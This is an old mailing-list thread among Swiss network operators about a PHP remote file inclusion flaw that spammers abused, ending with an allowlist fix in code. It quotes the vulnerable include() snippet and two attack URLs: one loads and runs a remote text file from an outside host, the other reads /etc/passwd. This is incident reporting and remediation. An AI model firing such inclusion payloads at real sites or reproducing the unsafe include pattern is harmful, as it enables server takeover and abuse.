That's bad coding anyway:
http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd
Regards Gianni
Radek Mrskos wrote:
I think this is what you should have anyway in your php.ini:
allow_url_fopen = Off
/Radek
On 19.02.2009 at 16:31, Mike Kellenberger wrote:
Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
--
Mike Kellenberger
mike.kellenberger@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Kind regards
Radek Mrskos
Baechlerstr. 12
CH-8802 Kilchberg
Email: mrskos@volume.ch
Tel: +41 43 534 40 24
Mob: +41 79 219 68 66
Fax: +41 86079 2196 866
PGP:0x8CB69F6D
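Both requests quoted in this thread, the remote URL and the `/etc/passwd` path, are rejected once the parameter is used only as a key into a fixed allowlist instead of being passed to `include()`. The following is an added example, not code from any poster in the thread; the page keys, file names and the `pages/` directory are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. The page keys, file names and
// the pages/ directory are assumptions made for illustration.

// Permitted page keys mapped to files on disk. The request value is only
// ever used as a lookup key, never as a path or URL.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'imprint' => 'imprint.php',
];

/**
 * Resolve a request parameter to an includable file, or null if rejected.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?called_page_link[]=x) and unknown keys are rejected, which
    // covers both "http://..." and "/etc/passwd" style values.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the file must exist and resolve to a location
    // underneath $baseDir (guards against a symlinked or edited map entry).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET instead of using a global
// variable that is filled in from the query string.
$key  = $_GET['called_page_link'] ?? 'home';
$file = resolve_page($key, __DIR__ . '/pages');

if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

With this in place `allow_url_fopen = Off` remains a sensible server-wide default, but the script no longer depends on it.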